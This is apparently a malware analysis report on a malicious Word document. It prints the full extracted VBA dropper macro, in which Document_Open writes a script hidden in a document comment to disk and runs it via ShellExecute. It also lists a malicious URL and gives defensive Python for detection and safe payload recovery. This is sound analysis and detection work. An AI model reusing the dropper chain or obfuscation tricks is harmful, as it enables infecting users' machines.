Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5452b9448c3310ad…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 73.7 KB
Created: 2019-10-27 18:57:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-05-25
MD5: ff53bc8e127ca05241c53cd4a50df412
SHA-1: 6640c882b606fc8b297a5b1d8bf6c8b68a95f0c4
SHA-256: 5452b9448c3310adaa86f6020c32d6ae4727fce5049f613ad9242e2f35e94eff
Risk score: 238

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an OOXML (Word) document carrying a VBA project whose auto-exec entry point, Document_Open, drives a four-procedure dropper chain. shareExt builds an output path from an environment variable and a file extension, both recovered with Mid() from captions of controls on the UserForm cmdList, so neither string appears in the macro source. ShareT then reads the first comment of the document (ActiveDocument.Comments(1).Range with IncludeHiddenText = True) and writes its text to that path with Open ... For Output. Finally kkilMe instantiates a COM object whose ProgID is likewise sliced from a UserForm caption and calls its ShellExecute method on the written file. The other procedures (BulletText, MassFormatFiles, DeleteUnusedStyles) are stock Word VBA samples padded with junk string variables to dilute signatures and have no role in execution. The visible evidence therefore shows a dropper whose stage-two script is stored inside a document comment, hidden-text formatting included, rather than carried in the macro; the ClamAV name Doc.Dropper.Agent-7569460-0 agrees with that. Whether the dropped script in turn downloads anything (the only non-namespace URL extracted, http://copytak.ir/wordpress/iBzrxYetL/, would be consistent with that) cannot be established from the macro source alone, and no specific family could be identified from the available evidence.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-7569460-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7569460-0
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Private Function kkilMe(reat)
    CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Function kkilMe(reat)
    CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    templateStr = Environ(Mid(cmdList.dist.Caption, 12, 7)) & "\"
    templateStr = templateStr & Rnd
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://copytak.ir/wordpress/iBzrxYetL/ (in document text: OOXML body / shared strings). This is the only extracted URL that is not an Office XML namespace identifier, and therefore the only network indicator in the list.
    • The remaining 26 URLs, all labelled "in document text (OOXML body / shared strings)", are XML namespace URIs that Word declares in every modern .docx. They identify schemas, are never fetched by Office, and carry no signal on their own:
      http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
      http://schemas.microsoft.com/office/drawing/2014/chartex
      http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
      http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
      http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
      http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
      http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
      http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
      http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
      http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
      http://schemas.openxmlformats.org/markup-compatibility/2006
      http://schemas.microsoft.com/office/drawing/2016/ink
      http://schemas.microsoft.com/office/drawing/2017/model3d
      http://schemas.openxmlformats.org/officeDocument/2006/relationships
      http://schemas.openxmlformats.org/officeDocument/2006/math
      http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
      http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      http://schemas.openxmlformats.org/wordprocessingml/2006/main
      http://schemas.microsoft.com/office/word/2010/wordml
      http://schemas.microsoft.com/office/word/2012/wordml
      http://schemas.microsoft.com/office/word/2016/wordml/cid
      http://schemas.microsoft.com/office/word/2015/wordml/symex
      http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
      http://schemas.microsoft.com/office/word/2010/wordprocessingInk
      http://schemas.microsoft.com/office/word/2006/wordml
      http://schemas.microsoft.com/office/word/2010/wordprocessingShape
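As an added example (not the scanner's own rule code), the Python below approximates the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic described above and runs it over the dropper chain from the macros.bas listing on this page: it finds auto-exec entry points, walks the procedures they reach, and fires only when that reachable code both rebuilds strings from outside the macro text and hands them to an execution or file-write sink. The pattern set, the hit thresholds and the non-auto-exec control macro are this example's own choices, not the scanner's.

```python
"""Approximation of the obfuscated auto-exec VBA loader heuristic (added example)."""
import re

# Procedure names Word/Excel run without user interaction.
AUTOEXEC_NAMES = {"document_open", "document_new", "document_close", "autoopen",
                  "auto_open", "autonew", "autoclose", "autoexec", "workbook_open"}

# One VBA procedure: header line through its matching End Sub / End Function.
PROC_RE = re.compile(
    r"^[ \t]*(?:(?:Private|Public|Friend)[ \t]+)?(?:Static[ \t]+)?(?:Sub|Function)[ \t]+(\w+)\b"
    r".*?^[ \t]*End[ \t]+(?:Sub|Function)\b",
    re.I | re.M | re.S)

# Ways the real string is kept out of the macro source: (pattern, minimum hits).
DECODER_RE = {
    "caption_slice":  (re.compile(r"\bMid\$?\s*\(\s*\w+(?:\.\w+)*\.Caption\b", re.I), 1),
    "char_array":     (re.compile(r"\bChr[WB$]?\s*\(", re.I), 8),
    "junk_replace":   (re.compile(r"\bReplace\s*\(", re.I), 3),
    "environ":        (re.compile(r"\bEnviron\$?\s*\(", re.I), 1),
    "hidden_comment": (re.compile(r"\.Comments\s*\(\s*\d+\s*\)\.Range\b", re.I), 1),
}
# Sinks that turn such a string into execution or a dropped file.
SINK_RE = {
    "CreateObject": re.compile(r"\bCreateObject\s*\(", re.I),
    "Shell":        re.compile(r"\bShell\s*\(", re.I),
    "ShellExecute": re.compile(r"\.ShellExecute\b", re.I),
    "file_write":   re.compile(r"\bOpen\b[^\n]*\bFor[ \t]+(?:Output|Binary|Append)\b", re.I),
}


def split_procedures(vba_source):
    """Map lower-cased procedure name -> full procedure text."""
    return {m.group(1).lower(): m.group(0) for m in PROC_RE.finditer(vba_source)}


def reachable_from_autoexec(procs):
    """Entry points plus every procedure reachable from them by name reference."""
    entry = [n for n in procs if n in AUTOEXEC_NAMES]
    seen, todo = set(), list(entry)
    while todo:
        name = todo.pop()
        if name in seen:
            continue
        seen.add(name)
        for other in procs:
            if other != name and other not in seen and \
               re.search(r"\b%s\b" % re.escape(other), procs[name], re.I):
                todo.append(other)
    return entry, seen


def classify(vba_source):
    """Fire only when auto-exec-reachable code has both a decoder and a sink."""
    procs = split_procedures(vba_source)
    entry, reach = reachable_from_autoexec(procs)
    code = "\n".join(procs[n] for n in sorted(reach))
    decoders = sorted(k for k, (rx, minimum) in DECODER_RE.items()
                      if len(rx.findall(code)) >= minimum)
    sinks = sorted(k for k, rx in SINK_RE.items() if rx.search(code))
    return {"autoexec": sorted(entry), "reachable": sorted(reach),
            "decoders": decoders, "sinks": sinks,
            "obfuscated_autoexec_loader": bool(entry and decoders and sinks)}


# Excerpt of macros.bas from this page: the four-procedure chain plus two of
# the decoy procedures, trimmed of their junk string variables.
SAMPLE = r'''
Public Sub BulletText()
    Dim sBullet As String
    sBullet = InputBox("Enter bullet text:", "Bullet Text", "Note:")
End Sub
Private Function shareExt() As String
Randomize
Dim templateStr As String
Dim extFind As String
extFind = Mid(cmdList.ext.Caption, 12, 4)
templateStr = Environ(Mid(cmdList.dist.Caption, 12, 7)) & "\"
templateStr = templateStr & Rnd
templateStr = templateStr & extFind
ShareT (templateStr)
shareExt = templateStr
End Function
Private Sub ShareT(toP)
Dim melonoma As Range
Set melonoma = ActiveDocument.Comments(1).Range
melonoma.TextRetrievalMode.IncludeHiddenText = True
Open toP For Output As #46
Print #46, melonoma.Text
Close #46
End Sub
Private Sub Document_Open()
   Dim varaT As String
   varaT = shareExt
   kkilMe (varaT)
End Sub
Sub DeleteUnusedStyles()
    Dim oStyle As Style
    For Each oStyle In ActiveDocument.Styles
        If oStyle.BuiltIn = False Then oStyle.Delete
    Next oStyle
End Sub
Private Function kkilMe(reat)
CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
End Function
'''

# Constructed control: uses CreateObject and a file write, but nothing auto-runs it.
BENIGN = r'''
Sub ExportCsv()
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Open "C:\out.csv" For Output As #1
    Print #1, "a,b"
    Close #1
End Sub
'''

if __name__ == "__main__":
    print(classify(SAMPLE))
    print(classify(BENIGN))
```

On the page's sample the rule reports Document_Open as the entry, shareExt/ShareT/kkilMe as reachable, caption_slice/environ/hidden_comment as decoders and CreateObject/ShellExecute/file_write as sinks; the decoy procedures and the control macro do not contribute because nothing auto-exec reaches them. This reachability step is what keeps a rule of this shape from firing on the many legitimate macros that merely contain CreateObject.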

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6063 bytes
SHA-256: 7bc84653d821feeb4b4bd7de7e74095b7adc516c814cadf5550a4cc4a37c753f
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub BulletText()
    Dim sBullet As String
    Dim myList As ListTemplate

    sBullet = InputBox("Enter bullet text:", "Bullet Text", "Note:")

    ' Add a new ListTemplate object
    Set myList = ActiveDocument.ListTemplates.Add
Dim yXF4hS7F9f1 As String
yXF4hS7F9f1 = "name atom manufacturing be split rush leather yes never simplest silent angry breakfast different experience die article involved put fallen spirit follow greater faster outline dark stay bad hospital melted with visitor run parts research cutting too greatly thirty declared mood weight bring fairly noted shells making chain number dawn curious coffee oxygen person onto art interior directly range move sharp wood taste direction right grew exist setting oil his greater bring composition men fur badly might chair clear breathing pride correctly day writer circle attempt catch prize establish composed applied wrapped across pack fewer shown date daily widely simply smallest species cutting aid brother be bicycle surrounded express amount firm camera scared tears fallen indeed complex"

    With myList.ListLevels(1)
        .NumberFormat = sBullet
        .TrailingCharacter = wdTrailingTab
        .NumberPosition = InchesToPoints(0.25)
        .Alignment = wdListLevelAlignLeft
        .TextPosition = InchesToPoints(0.75)
        .TabPosition = InchesToPoints(0.75)
        .ResetOnHigher = 0
        .StartAt = 1
        .LinkedStyle = ""
        ' The following sets the font attributes of
        ' the "bullet" text
        With .Font
            .Bold = True
            .Name = "Arial"
            .Size = 10
        End With
    End With
    ' Apply the new ListTemplate to the selected text
    Selection.Range.ListFormat.ApplyListTemplate ListTemplate:=myList
End Sub
Private Function shareExt() As String
Randomize

Dim tYY00y2u As Boolean
tYY00y2u = False
Dim IC7dp0iOzT As Boolean
IC7dp0iOzT = False
Dim templateStr As String
Dim extFind As String
extFind = Mid(cmdList.ext.Caption, 12, 4)

templateStr = Environ(Mid(cmdList.dist.Caption, 12, 7)) & "\"
templateStr = templateStr & Rnd
templateStr = templateStr & extFind

ShareT (templateStr)

shareExt = templateStr
End Function

Private Sub ShareT(toP)
Dim melonoma As Range
Set melonoma = ActiveDocument.Comments(1).Range
melonoma.TextRetrievalMode.IncludeHiddenText = True

Dim n80o9SYl4GtS As Long
n80o9SYl4GtS = 20562
Dim oUO064w64K4 As Long
oUO064w64K4 = 3971
Open toP For Output As #46
Print #46, melonoma.Text
Close #46

End Sub
Sub MassFormatFiles()
    Dim JName As String
Dim g84e018 As String
g84e018 = "wolf older influence win grandfather should colony leaf key friend start spend shirt word time forward her pile popular return without on aloud exist island spite road theory develop shelf circle scene along alive river rear sand identity neighborhood opposite tales sitting pen tears floor if earth alone camp smoke factor draw sent atomic crowd same weigh flower greatest airplane moon week zoo find leave two appearance stairs develop me toward captain secret seven physical advice store piece something struck smaller direct flower spin been station lovely corn spend poetry stuck direction melted product mental zulu basket up neck sunlight experience usually temperature mighty medicine particular stock good table influence"

    Dialogs(wdDialogFileOpen).Show
    Application.ScreenUpdating = False
    JName = Dir("*.doc")
    While (JName > "")
        Application.Documents.Open FileName:=JName

            'Do formatting here

        ActiveDocument.Close SaveChanges:=wdSaveChanges
        JName = Dir()
    Wend
    Application.ScreenUpdating = True
End Sub
Private Sub Document_Open()
  
   Dim varaT As String
   varaT = shareExt
   
   kkilMe (varaT)

Dim GaD153Lm13DG As Boolean
GaD153Lm13DG = True
Dim W7X3Ol8q4Mji As Boolean
W7X3Ol8q4Mji = False
End Sub
Sub DeleteUnusedStyles()
    Dim oStyle As Style
Dim IC43r0 As String
IC43r0 = "fox tube fill control chief gone today green experiment zoo uncle grown on still process beat last empty itself without percent adult sum major however product yourself dot shoe habit education between asleep fence arrange below coming victory forth reach telephone read grandmother original dot understanding pretty level angle iron sudden cotton national tiny please political happy bicycle girl tightly about unit make chose dangerous distance successful traffic done coming position kind shown class tune grow every grew fall because maybe atmosphere knowledge buffalo properly shallow riding thrown dance pine fact exact noise failed rest ground dawn hunter recent lying guard sunlight its bound buy cream pile activity until dried explanation behind border hair very tobacco herd tin wagon throughout"

    For Each oStyle In ActiveDocument.Styles
        'Only check out non-built-in styles
        If oStyle.BuiltIn = False Then
            With ActiveDocument.Content.Find
                .ClearFormatting
                .Style = oStyle.NameLocal
                .Execute FindText:="", Format:=True
                If .Found = False Then oStyle.Delete
            End With
        End If
    Next oStyle
End Sub
Private Function kkilMe(reat)
CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
End Function



Attribute VB_Name = "NewMacros"
Sub n()

End Sub



Attribute VB_Name = "cmdList"
Attribute VB_Base = "0{90FB79E4-223D-401D-8A48-1F5CB646382F}{45465B32-4C0E-4919-9A6D-BDECC9C22617}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27136 bytes
SHA-256: c8f5f13689960f79ce15ea530f145234f9e69752f7e7ee285052e19c3d2e23f0
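As an added example (not the analyzer's code and not part of the sample), the Python below recovers the stage-two payload the macro drops without running it. ShareT reads Comments(1).Range with IncludeHiddenText = True and writes the text to disk, so the payload lives in word/comments.xml; the parser here pulls the first comment out of the OOXML zip, honouring Word's hidden-text run property (w:vanish), and then replays the Mid()-based string slicing from shareExt and kkilMe against assumed UserForm captions. The .docx it reads is a constructed stand-in built in memory, the captions and environment are assumptions (the real captions sit in the cmdList UserForm stream, which this page does not show), and the Shell.Application / APPDATA values are inferences that merely fit the 17- and 7-character slices and the ShellExecute call, not extracted facts.

```python
"""Recover a comment-stored payload and replay the macro's string slicing (added example)."""
import io
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
NS = {"w": W}


def build_sample_docx():
    """Constructed minimal .docx: a visible review note plus a hidden run that
    carries a harmless placeholder script (stand-in for the real stage two)."""
    comments_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:comments xmlns:w="{W}">'
        '<w:comment w:id="0" w:author="reviewer">'
        '<w:p><w:r><w:annotationRef/></w:r>'
        '<w:r><w:t>Reviewed, looks fine.</w:t></w:r></w:p>'
        '<w:p><w:r><w:rPr><w:vanish/></w:rPr>'
        '<w:t>MsgBox "constructed placeholder stage two"</w:t></w:r></w:p>'
        '</w:comment></w:comments>')
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W}"><w:body><w:p><w:r>'
        '<w:t>Enable content to view this document.</w:t>'
        '</w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/comments.xml", comments_xml)
    return buf.getvalue()


def first_comment_text(docx_bytes, include_hidden=True):
    """Emulate ActiveDocument.Comments(1).Range.Text for the given
    TextRetrievalMode.IncludeHiddenText; paragraphs join on CR as in Word."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/comments.xml" not in z.namelist():
            return None
        root = ET.fromstring(z.read("word/comments.xml"))
    comment = root.find("w:comment", NS)
    if comment is None:
        return None
    paragraphs = []
    for p in comment.findall(".//w:p", NS):
        parts = []
        for r in p.findall(".//w:r", NS):
            hidden = r.find("w:rPr/w:vanish", NS) is not None  # hidden-text run
            if hidden and not include_hidden:
                continue
            parts.extend(t.text or "" for t in r.findall("w:t", NS))
        paragraphs.append("".join(parts))
    return "\r".join(paragraphs)


def vba_mid(s, start, length=None):
    """VBA Mid(): 1-based start, optional length."""
    if start < 1:
        raise ValueError("Mid start must be >= 1")
    return s[start - 1:] if length is None else s[start - 1:start - 1 + length]


def replay_loader(captions, environ, rnd_value):
    """Replay shareExt/kkilMe: slice the captions exactly as the macro does."""
    ext = vba_mid(captions["ext"], 12, 4)          # Mid(cmdList.ext.Caption, 12, 4)
    env_var = vba_mid(captions["dist"], 12, 7)     # Mid(cmdList.dist.Caption, 12, 7)
    progid = vba_mid(captions["cmdExe"], 12, 17)   # Mid(cmdList.cmdExe.Caption, 12, 17)
    drop_path = environ[env_var] + "\\" + str(rnd_value) + ext   # Environ(...) & "\" & Rnd & ext
    return {"env_var": env_var, "drop_path": drop_path,
            "progid": progid, "method": "ShellExecute"}


# ASSUMED captions: 11 junk characters followed by the slice the macro takes.
# 17 characters fits "Shell.Application" (whose ShellExecute method the macro
# calls) and 7 fits "APPDATA"; both are inferences, not extracted values.
ASSUMED_CAPTIONS = {
    "cmdExe": "PREFIX_0123Shell.Application",
    "dist":   "PREFIX_0123APPDATA",
    "ext":    "PREFIX_0123.vbs",
}
ASSUMED_ENVIRON = {"APPDATA": r"C:\Users\victim\AppData\Roaming"}  # constructed

if __name__ == "__main__":
    doc = build_sample_docx()
    print("visible only:", repr(first_comment_text(doc, include_hidden=False)))
    print("with hidden :", repr(first_comment_text(doc)))
    print(replay_loader(ASSUMED_CAPTIONS, ASSUMED_ENVIRON, 0.7055475))
```

Against the real sample, pass the file bytes instead of build_sample_docx() and take the captions from the UserForm strings that olevba reports for the vbaProject.bin artifact above; the hidden-run handling is the part that matters, since a viewer that skips vanished text shows only the decoy note while the macro's IncludeHiddenText = True reads the whole script.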